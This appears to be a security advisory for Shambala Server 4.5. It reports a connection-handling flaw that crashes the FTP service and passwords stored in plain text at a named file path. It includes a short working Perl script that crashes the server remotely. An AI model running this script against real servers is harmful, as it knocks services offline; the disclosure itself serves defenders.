Vulnerability

    Shambala

Affected

    Shambala Server 4.5

Description

    'zillion' found following.  Shambala is a low cost, multi-featured
    FTP and Web  server distributed by  Evolvable Corporation.   It is
    used by numerous  amateur and small  office/home webmasters as  an
    economical way  to launch  and manage  a website.   A problem with
    Shambala's  mishandling  of  connections  and disconnections would
    potentially enable a (simple) denial-of-service attack.  A  second
    observation  is  Shambala's  storage  of passwords in-the-clear on
    the server: a major problem on Windows 95 and 98 platforms.

    Vendor's blurb: "Shambala is an easy to use communications  server
    featuring the ability  to serve and  access web sites,  ftp sites,
    and chat rooms.  Using Shambala, you can quickly create a web site
    and host  it from  any PC.   Shambala doesn't  require NT  and its
    installation is non-invasive."

    Shambala  does  not  handle  all  connections  correctly.   It  is
    therefore possible to remotely crash the ftp server using a custom
    script  which  automates  the  action  of  opening  and  closing a
    connection  to  and  from  the  server.   The  server crashes upon
    disconnection and gives the following error:

        Run-time error `20127`
        invalid ConnectionID

    A second problem  is that Shambala  stores all passwords  in plain
    text on the server:

        c:\program files\shambala\passwords.txt (in our case)

    This is not such a big  deal on an NT server as  permissions could
    be set to deny  access to this file.   Because the server is  also
    shipped for  Windows 95  and Windows  98 it  could be possible for
    any user to gain access to the file.

    #!/usr/bin/perl
    #
    # This tool (tool not exploit!) crashes shambale server 4.5
    # This is a stripped version of Guido Bakkers exploit code (bedankt)
    #
    use Getopt::Std;
    use IO::Socket;
    getopts('s:', \%args);
    &usage if !defined($args{s});
    $serv = $args{s};
    $EOL="\015\012";
    $remote = IO::Socket::INET->new(
                       Proto       => "tcp",
                       PeerAddr    => $args{s},
                       PeerPort    => "ftp(21)",
                   ) || die("Unable to connect to ftp port at $args{s}\n");
    $remote->autoflush(1);
    print "Done...\n";
    exit; # remove this and the server will *NOT* crash
    sub usage {die("\n$0 -s ipaddress\n\n");}

Solution

    It is recommended to disable  the daemon until a fixed  package is
    released.  The problem will be fixed in a next release.